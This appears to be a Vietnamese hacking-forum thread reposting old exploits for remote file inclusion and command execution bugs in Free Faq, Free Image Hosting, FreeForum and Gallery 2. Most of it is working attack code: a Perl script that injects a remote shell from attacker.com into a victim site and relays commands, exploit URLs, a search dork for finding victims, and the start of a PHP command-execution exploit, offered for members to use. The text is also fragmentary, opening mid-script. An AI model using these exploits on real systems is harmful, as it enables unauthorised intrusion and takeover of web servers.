Code: in forum.php.
Trang 1die($temp[1]);
}
//if you are here
echo "exploit failed ";
?> Black_hat_cr(HCE) Free Faq V 1.0.e Remote File Inclusion Code: #!/usr/bin/perl ################################################################## ################################### # #
# Free Faq V 1.0.e #
# #
# Class: Remote File Inclusion Vulnerability #
# Date: 2006/10/19 #
# #
# Remote: Yes #
# #
# Type: high #
# #
# Site: http://www.axxess.ca/FreeFAQ/dl_axxess.php
# # #
##################################################################
###################################
use IO::Socket;
use LWP::Simple;
$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script
print "\n";
Trang 2"##################################################################
########\n";
print "# #\n";
print "# Free Faq V 1.0.e Remote File Inclusion Vulnerability #\n"; print "# Vul File: index.php #\n";
print "# Bug Found By : Ashiyane Corporation #\n";
print "# Email: Alireza Ahari Ahari[at]ashiyane.ir #\n";
print "# Web Site : www.Ashiyane.ir #\n";
print "# #\n";
"##################################################################
########\n";
if (@ARGV < 2)
{
print "\n Usage: Ashiyane.pl [host] [path] ";
print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vul="index.php?faqpath="
print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";
print "<Shell> ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
PeerPort=>"80") or die "Could not connect to
host.\n\n";
print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n";
Trang 3print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "<Shell> ";
$cmd = <STDIN>;
}
Black_hat_cr(HCE)
Free Image Hosting V1(Remote file include)
xploit:
[server]/[path]/forgot_pass.php?AD_BODY_TEMP=con_c99
kiếm victim:
http://www.google.com/search?hl=en&q oogle+Search
Black_hat_cr(HCE)
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
Dạo này làm ăn khó khăn quá, có cái bug này anh em ăn đỡ khi nào có bug đẹp tớ
bù sao
Trích:
Trang 4-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: http://www.ezforum.de/downloads/Forum.zip (229kb)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vuln Code: in forum.php
if(!isset($cfg_file))$cfg_file="config/config.inc.php";
if(!isset($fpath))$fpath=".";
if(!isset($getvar))$getvar='';
include("$fpath/lib/php/classes.php");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: /forum.php?cfg_file=1&fpath=http://sh3LL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,
Trang 5-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# milw0rm.com [2006-10-07]
navaro(HCE)
Gallery 2 - Remote Commands Execution Exploit
Gallery <= 2.0.3 stepOrder[] Remote Commands Execution Exploit
Code:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Gallery <=2.0.3 \"stepOrder[]\" remote cmmnds xctn \r\n";
echo "by rgod rgod<AT>autistici<DOT>org \r\n";
echo "site: http://retrogod.altervista.org \r\n\r\n";
echo "-> works with register_globals = On and magic_quotes_gpc = Off \r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS \r\n"; echo "host: target server (ip/hostname) \r\n";
echo "path: path to gallery2 \r\n";
echo "user-pass: this exploit needs valid user credentials to upload a \r\n";
echo " watermark \r\n";
echo "cmd: a shell command \r\n";
echo "Options: \r\n";
echo " -p[port]: specify a port other than 80 \r\n";
echo " -P[ip:port]: specify a proxy \r\n";
echo "Examples: \r\n";
echo "php ".$argv[0]." localhost /gallery2/ user pass cat / /config.php \r\n";